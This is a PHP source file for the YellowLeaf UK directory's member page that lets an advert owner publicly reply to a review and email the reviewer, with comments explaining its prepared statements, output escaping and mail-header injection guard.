Current File : /home/yellowleaf/public_html/members//review_reply.php
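<?php
/**
 * members/review_reply.php - lets the owner of an advert post a public reply
 * to one review and e-mails the reviewer a link to the advert page.
 *
 * Inputs:  $_GET['adid'], $_GET['revid'], $_POST['submit'], $_POST['reply'].
 * Relies on the includes below for $connect (used as a mysqli handle here),
 * $memberid and advert_check() - none of them are defined in this file.
 * Outputs for the template that follows: $success, $error, $rev_row,
 * $reviewContent, $advert_rating, $adid, $revid, $styleManage.
 *
 * Security notes on this version:
 *  - every SQL statement is a prepared statement; request values are never
 *    concatenated into SQL text;
 *  - the review is looked up by rev_id AND rev_ad_id, so a member can only
 *    read or answer reviews of the advert that passed advert_check();
 *  - the recipient name, e-mail and advert id come from the database row,
 *    not from hidden form fields, and are validated before reaching mail();
 *  - database values are HTML-escaped before being placed in markup.
 *
 * NOTE(review): no anti-CSRF token is visible on the form or checked here -
 * confirm whether accesscontrol.php provides one.
 * NOTE(review): the 250 character limit on the reply is enforced only by
 * client-side script; the column limit is not visible from this file.
 */
$path  = $_SERVER['DOCUMENT_ROOT'];
include_once $path.'/connect_db.php';
include 'accesscontrol.php';
// css for menu
$styleManage = 'color:#ff6131;background-color:#fff;border-top:1px solid #c9c9c9;font-weight:bold;';

// State read by the template; initialised so nothing is used while undefined.
$success = FALSE;
$error = FALSE;
$reviewContent = '';
$advert_rating = '';
$revStyleCss = '';
$revStyleCss1 = '';
$ratings = array();

// Accept only scalar strings; "?revid[]=x" would otherwise arrive as an array.
$revid = (isset($_GET['revid']) && is_string($_GET['revid'])) ? $_GET['revid'] : '';
$adid  = (isset($_GET['adid']) && is_string($_GET['adid'])) ? $_GET['adid'] : '';

// HTML-escape a value for element content or a quoted attribute.
$esc = static function ($value) {
	return htmlentities((string) $value, ENT_QUOTES);
};

// Run one prepared statement. On failure the driver error goes to the server
// log only, so schema details are not echoed to the browser.
$run = static function ($db, $sql, $types, array $params) {
	$stmt = $db->prepare($sql);
	if ($stmt === false || !$stmt->bind_param($types, ...$params) || !$stmt->execute()) {
		error_log('review_reply.php: query failed: '.$db->error);
		http_response_code(500);
		exit('Sorry, something went wrong. Please try again later.');
	}
	return $stmt;
};

// check if advert belongs to member
if(advert_check($adid,$memberid)===false){header('Location: index.html');exit();}

// selecting review - restricted to the advert checked above, so the ownership
// check on $adid also covers $revid. get_result() needs the mysqlnd driver.
$r7 = $run($connect, "SELECT * FROM reviews WHERE rev_id = ? AND rev_ad_id = ? LIMIT 1", 'ss', array($revid, $adid))->get_result();
$rev_row = $r7 ? $r7->fetch_array() : null;
// Stop here after redirecting: without exit() the rest of the script would still run.
if(!$rev_row){header('Location: index.html');exit();}
$rev_numRow = $r7->num_rows;

if(isset($_POST['submit'])){
	$rev_reply = (isset($_POST['reply']) && is_string($_POST['reply'])) ? $_POST['reply'] : '';

	// The page tells the member a review can be answered once; enforce that here
	// too, and ignore empty replies, so a replayed POST cannot overwrite the
	// stored reply or re-send the notification e-mail.
	if(trim($rev_reply) !== '' && (string) $rev_row['rev_reply'] === ''){
		// Recipient details come from the stored review, never from the form.
		$rev_email = $rev_row['rev_email'];
		$rev_name  = $rev_row['rev_name'];

		$run($connect, "UPDATE reviews SET rev_reply = ? WHERE rev_id = ? AND rev_ad_id = ?", 'sss', array($rev_reply, $revid, $adid));
		$rev_row['rev_reply'] = $rev_reply; // show the saved reply below without a second SELECT

		$select_ad = $run($connect, "SELECT * FROM ads WHERE adid = ?", 's', array($adid))->get_result();
		$b = $select_ad ? $select_ad->fetch_array() : null;
		$companyname = ($b && isset($b['companyname'])) ? $b['companyname'] : '';
		$r_ad_name=strtolower($companyname);
		$ad_name=str_replace(" ","-",$r_ad_name);

		// Header-injection guard: the display name loses CR/LF and address
		// delimiters, and the address must be a single valid mailbox.
		$safe_name  = trim(preg_replace('/[\r\n\t<>",;:\\\\]+/', ' ', (string) $rev_name));
		$safe_email = filter_var($rev_email, FILTER_VALIDATE_EMAIL);

		if($safe_email !== false){
			$to  = ($safe_name !== '') ? "$safe_name <$safe_email>" : $safe_email;
			$subject = 'Review Reponse - YellowLeaf';
			$email_message = '
		<div style="margin-bottom:5px;">Dear <b>'.$esc($rev_name).'</b></div>
		<div>
		The owner of '.$esc($companyname).' has made a response to your review at YellowLeaf. Please click on the link below to view your review.<br><br>
		<a href="http://www.yellowleaf.co.uk/pages/'.$esc($adid).'-'.$esc($ad_name).'.html">Click here to view the response.</a>
		</div>';

			// message template which includes $message and $email_message
			include '../email_tmp/em_tmp.php';

			// To send HTML mail, the Content-type header must be set
			$headers  = 'MIME-Version: 1.0' . "\r\n";
			$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

			$headers .= 'From: YellowLeaf <support@yellowleaf.co.uk>' . "\r\n";
			mail($to, $subject, $message, $headers,"-f support@yellowleaf.co.uk");
		}

		$success=TRUE;
	}
}

// Build the review panel. Every value taken from the row is escaped.
$reviewContent .= '<div style="background-color:#fafafa;padding:0px 40px 20px;margin-top:20px;" class="curv7">';
$reviewContent .= '<table class="revTbl" width="100%">';
$ratings[] = $rev_row['rev_rating'];
$reviewContent .= '<tr><td valign="top" style="padding-top:20px;'.$revStyleCss.'">';
$reviewContent .= '<div style="font-size:18pt;color:#294576;">'.$esc($rev_row['rev_name']).'</div>';
$reviewContent .= '<div style="margin-top:6px;font-size:10pt;color:#666;"><b>Review given on: </b>'.date('d/m/Y',(int) $rev_row['rev_date']).'</div>';
$reviewContent .= '<div class="curv7" style="margin-top:15px;background-color:#fff;padding:15px;border:1px solid #a8a8a8;">'.$esc($rev_row['rev_comment']).'</div></td>';
$reviewContent .= '<td valign="middle" style="text-align:center;width:155px;padding-top:20px;padding-left:20px;'.$revStyleCss.'"><div style="font-size:20pt;font-weight:bold">';
$reviewContent .= $esc($rev_row['rev_rating']).'/5<br><img class="rate_'.$esc($rev_row['rev_rating']).'" src="/img/img_trans.gif" width="1" height="1" /></div></td></tr>';

if($rev_row['rev_reply']!=''){
	$reviewContent .= '<tr><td colspan="2" style="padding:20px 30px 20px 60px;'.$revStyleCss1.'">';
	$reviewContent .= '<div class="curv7" style="background-color:#eee;padding:15px;border:1px solid #a8a8a8;"><b>Your Response ...</b><br>';
	$reviewContent .= $esc($rev_row['rev_reply']).'</div></td></tr>';
}

$reviewContent .= '</table></div>';
$arr_sum = array_sum($ratings);
$mean = $arr_sum  / $rev_numRow;
$average = round($mean*2)/2; // round to the nearest half
$averageCss=str_replace(".","-",$average);
$advert_rating='<img class="rate_'.$averageCss.'" src="/img/img_trans.gif" width="1" height="1" /><meta itemprop="rating" content="'.$average.'" /> ';
?>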
<!DOCTYPE html>
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>YellowLeaf UK</title>
<link href="style.css" rel="stylesheet" type="text/css">
<style>
.det_cnt{padding:30px;border-bottom:1px solid #cecece;}
.det_head{color:#15c;font-size:14pt;margin-bottom:5px;font-weight:bold;}
.det_info{color:#222;line-height:21px;}
.opTbl td{padding:10px}
.smlPic{width:130px;margin:0px;}
.imgShadd{-moz-box-shadow:0px 2px 3px 0px #666; -webkit-box-shadow: 0px 2px 3px 0px #666; box-shadow:0px 2px 3px 0px #666;}
.bxShadd{-moz-box-shadow:0px 2px 6px 0px #E4E4E4; -webkit-box-shadow:0px 2px 6px 0px #E4E4E4; box-shadow:0px 2px 6px 0px #E4E4E4;}
.picCn{height:80px;overflow:hidden;margin-bottom:15px;}
.promoTbl td{padding:20px 0px;<?=$promCss?>}
.rate_0{width:101px;height:19px;background:url(/img/stars.png) 0 0;}
.rate_0-5{width:101px;height:19px;background:url(/img/stars.png) 0 -20px;}
.rate_1{width:101px;height:19px;background:url(/img/stars.png) 0 -39px;}
.rate_1-5{width:101px;height:19px;background:url(/img/stars.png) 0 -58px;}
.rate_2{width:101px;height:19px;background:url(/img/stars.png) 0 -77px;}
.rate_2-5{width:101px;height:19px;background:url(/img/stars.png) 0 -96px;}
.rate_3{width:101px;height:19px;background:url(/img/stars.png) 0 -115px;}
.rate_3-5{width:101px;height:19px;background:url(/img/stars.png) 0 -134px;}
.rate_4{width:101px;height:19px;background:url(/img/stars.png) 0 -153px;}
.rate_4-5{width:101px;height:19px;background:url(/img/stars.png) 0 -172px;}
.rate_5{width:101px;height:19px;background:url(/img/stars.png) 0 -191px;}
</style>
<script>
function showRev(){
  // Reveal the review panel and swap the toggle buttons so that only
  // "Hide Review" stays visible.
  var displayById = { review: '', hideBtn: '', showBtn: 'none' };
  Object.keys(displayById).forEach(function (id) {
    document.getElementById(id).style.display = displayById[id];
  });
}

function hideRev(){
  // Collapse the review panel and swap the toggle buttons so that only
  // "Show Review" stays visible.
  var displayById = { review: 'none', hideBtn: 'none', showBtn: '' };
  Object.keys(displayById).forEach(function (id) {
    document.getElementById(id).style.display = displayById[id];
  });
}
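/**
 * Keep a text field within maxlimit characters and show how many are left.
 *
 * @param {string} field1    id of the input or textarea being limited
 * @param {string} cntfield1 id of the field that displays the remaining count
 * @param {number} maxlimit  maximum number of characters allowed
 *
 * This is a convenience for the person typing only: a browser-side limit can
 * be bypassed, so the server must apply its own length check to the value.
 */
function textCounter(field1, cntfield1, maxlimit) {
  var field = document.getElementById(field1);
  var cntfield = document.getElementById(cntfield1);
  if (field.value.length > maxlimit) {
    // too long: trim to the limit
    field.value = field.value.substring(0, maxlimit);
  }
  // Always refresh the counter. The original skipped this after trimming, so
  // the display kept a stale value instead of dropping to 0.
  cntfield.value = maxlimit - field.value.length;
}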
</script>
</head>

<body>

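<?php
/*
 * Page body: reply form, success notice, or error notice for one review.
 * Reads $error, $success, $rev_row, $adid, $revid and $reviewContent, which
 * the script at the top of this file sets.
 *
 * Values taken from the request or from the reviews row are escaped for the
 * place they are printed: htmlentities(..., ENT_QUOTES) inside HTML text and
 * attributes, rawurlencode() inside query strings. $reviewContent is printed
 * as-is because it is already assembled as HTML by the script above.
 * Full "<?php" tags are used so the page does not depend on short_open_tag.
 *
 * NOTE(review): the hidden email/name/adid fields are supplied by the browser
 * and can be edited before submit; the handler should take those values from
 * the database row rather than from $_POST.
 */
include 'header.php'; ?>
<table class="tbwdth">
	<tr>
		<td valign="top" style="width:210px;"><?php include 'member_menu.php'; ?>
		</td>
		<td valign="top" class="cnGrad">
		<?php if($error==FALSE){ ?>
		<div class="cnHead" style="margin-bottom:15px;">Review Reply</div>
		<?php if($success==TRUE){ ?>
		<div class="successDvBx">
		Your response has been made successfully. <br><a href="review.html?adid=<?=rawurlencode($rev_row['rev_ad_id'])?>">Go back to reviews ></a>
		</div>
		<?php }else{ ?>
		<div class="curv3" style="border:1px solid #bbb;padding:20px;background-color:#fdfdfd;margin-bottom:20px;">
		<?php if($rev_row['rev_reply']==''){ ?>
			<form action="review_reply.html?adid=<?=rawurlencode($adid)?>&amp;revid=<?=rawurlencode($revid)?>" method="POST">
			<div style="font-weight:bold;font-size:12pt;color:#404855;">Reply to: <?=htmlentities($rev_row['rev_name'], ENT_QUOTES)?></div>
			<div style="font-size:10pt;font-weight:bold;color:#9d3333;margin:10px 0px 4px;">Please note: Your reply will be made public.</div>
			<textarea style="width:590px;"  onkeydown="textCounter('reply','remLen1',250)" id="reply" name="reply" rows="5"></textarea>
			<div style="margin-top:5px;">
				<input readonly="" type="text" id="remLen1" name="remLen1" size="3" maxlength="3" value="250" style="background-color:#fcfcfc;border:1px solid #aaa;padding:5px;"> Characters left
			</div>
			<input type="hidden" name="email" value="<?=htmlentities($rev_row['rev_email'], ENT_QUOTES)?>">
			<input type="hidden" name="name" value="<?=htmlentities($rev_row['rev_name'], ENT_QUOTES)?>">
			<input type="hidden" name="adid" value="<?=htmlentities($rev_row['rev_ad_id'], ENT_QUOTES)?>">
			<input type="submit" name="submit" class="blueBtn fancyBtn" style="border:0px;float:none;margin-top:10px" value="Reply to Review >>">
			<a style="float:none;font-weight:bold;" href="review.html?adid=<?=rawurlencode($rev_row['rev_ad_id'])?>">Go back to reviews ></a>
			</form>
		<?php }else{ ?>
			You have already replied to the review!<br><br>
			<a class="blueBtn fancyBtn" style="float:none;" href="review.html?adid=<?=rawurlencode($rev_row['rev_ad_id'])?>">Go back to reviews ></a>
		<?php } ?>
		</div>
		<?php /* the closing div above now sits inside this branch, so the success view no longer emits an unmatched </div> */ } ?>
		<hr noshade color="#C0C0C0" size="1">
		<input type="button" class="redBtn fancyBtn" id="hideBtn" style="border:0px;float:none;" onclick="hideRev()" value="Hide Review">
		<input type="button" class="blueBtn fancyBtn" id="showBtn" style="border:0px;float:none;display:none;" onclick="showRev()" value="Show Review">
		<div id="review">
		<?=$reviewContent?>
		</div>
		<?php }else{ ?>
		<div class="cnHead" style="margin-bottom:15px;">ERROR!</div>
		<div style="font-size:11pt;font-weight:bold;">Review does not exist! <a href="index.html">Go back to Manage Advert ></a></div>
		<?php } ?>
		</td>
	</tr>
</table>
<?php include 'footer.php'; ?>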

</body>

</html>
